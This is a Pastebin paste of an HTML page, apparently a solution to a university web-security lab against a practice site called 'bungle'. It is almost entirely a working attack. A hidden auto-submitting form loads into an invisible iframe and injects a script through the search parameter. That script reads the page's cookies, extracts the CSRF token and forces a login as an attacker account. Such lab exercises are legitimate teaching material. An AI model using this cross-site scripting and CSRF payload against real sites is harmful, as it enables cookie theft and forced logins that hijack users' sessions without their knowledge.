Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <iframe name="iframe" id="iframe" style="display:block; visibility:hidden" src="http://bungle-cs461.cs.illinois.edu/"></iframe>
- <form id="getCookie" target="iframe" method="GET" action="http://bungle-cs461.cs.illinois.edu/search?">
- <input id="qstring" name="q" type="hidden" value="'<script>
- var cookie = document.cookie;
- var vartoken = cookie.split('csrf_token=');
- var url = 'http://bungle-cs461.cs.illinois.edu/login?csrfdefense=1&xssdefense=0'
- $.post(url, { username: 'attacker', password: 'l33th4x', csrf_token: vartoken[1]});
- </script>">
- </form>
- <script>
- document.getElementById('getCookie').submit();
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement